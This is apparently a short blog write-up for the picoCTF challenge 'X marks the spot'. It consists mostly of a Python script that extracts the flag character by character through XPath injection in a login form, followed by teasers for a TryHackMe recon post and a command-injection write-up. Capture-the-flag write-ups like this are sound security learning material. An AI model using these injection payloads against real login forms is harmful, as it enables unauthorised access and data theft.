X marks the spot - pico

March 15, 2022•96 words

import requests
import string
chars = string.ascii_lowercase + string.ascii_uppercase + string.digits + "}_"
flag = "picoCTF{"
while True:
    for char in chars:
        result = requests.post("http://mercury.picoctf.net:20297/", data = {"name": "' or //*[starts-with(text(), '"+flag+char+"')] or 'a'='b", "pass":"pass"})
        if "right path" in result.text:
            flag += char
            print("Added char: " + flag)
            break

👍❤️🫶👏👌🤯🤔😂😍😭😢😡😮

Subscribe to the author

You'll only receive email when they publish something new.

More from emacab98
All posts

Zeno - THM

January 7, 2022•394 words

At first, after a basic scan, there is only a 12340 TCP port open and SSH on 22. Connecting to it using netcat reveals this is an Apache 2.4.6 webserver, running on PHP 5.4.16.Using a directory scanner, we find out there is RMS installed on the webserver.In our manual scraping of the website, we can notice that, once we create an account, we get a sample message from an account called "administrator", and in the Contact Us section there is an email address that is registered to the domain pathfi...

Read post

caas - PicoCTF

March 15, 2022•102 words

Look at the JS provided, while at a first look you might think there might be some SSTI involved, once you look at the code it's clear: Node runs a system command inserting user input. We only need to stop the current program's execution and start something more useful. A combination of a semicolon and anything else you might want to use is fine. For example, I used ls to see file names in the current directory and then printed the one that interested me, like this:https://caas.mars.picoctf.net/...

Read post

X marks the spot - pico

More from emacab98All posts

Zeno - THM

caas - PicoCTF

More from emacab98
All posts